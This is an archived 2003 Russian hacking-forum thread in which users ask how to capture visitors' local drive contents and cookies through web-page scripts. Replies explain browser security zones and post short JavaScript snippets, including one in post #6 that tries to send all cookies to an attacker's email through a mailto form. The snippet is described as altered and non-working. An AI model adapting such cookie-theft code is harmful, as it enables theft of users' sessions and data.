ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.10.2003, 20:53
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился  в лог-файл и высылался на определенный мейл...
Я долго ломал башку, но так и не доперло...
Подскажите
 
Ответить с цитированием

  #2  
Старый 04.10.2003, 22:45
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Так просто не получится.
Есть такое понятие как зона безопасности.
Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен.
Так например такой код:

<iframe id="localdisk" src="c:\temp.html"></iframe>
< script>
alert(localdisk.document.innerHTML)
</script>

работать не будет, если он размещен на инетовской страничке(зона "Интернет&quot. Будет выдаваться ошибка "Доступ запрещен".
А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер&quot, то работать будет ))
 
Ответить с цитированием

  #3  
Старый 05.10.2003, 14:33
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


Smile

Речь идет даже не о хаке, а о простом просмотре диска c...
 
Ответить с цитированием

  #4  
Старый 06.10.2003, 12:21
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

А что, "просто просмотр диска С" это не хак ??
 
Ответить с цитированием

  #5  
Старый 11.10.2003, 01:19
next
Новичок
Регистрация: 16.08.2003
Сообщений: 20
Провел на форуме:
0

Репутация: 0
По умолчанию

скрипт < script>javascript:navigate('file:///c:/&#39</script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает?  http://www.danasoft.com/vipersig.jpg  
да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...)
 
Ответить с цитированием

  #6  
Старый 12.10.2003, 17:35
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

есть такая феня:
< script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form onsubmit="javascript:window.close();"
method=post action="mailto:ваше мыло@mail.ru"
ENCTYPE="text/plain"><input type=hidden
name=h1 value=',cook,'><input type=submit value="Доброго времени суток!">
</form>'
document.close("cookies"
</SCRIPT>
(скрипт в целях безопасности был немного изменён)
НО она Изменена!!!
Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...(((
 
Ответить с цитированием

  #7  
Старый 12.10.2003, 21:58
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

И что это ?
Насколько я понял это должно отсылать куки на мыло?
Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет.
И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ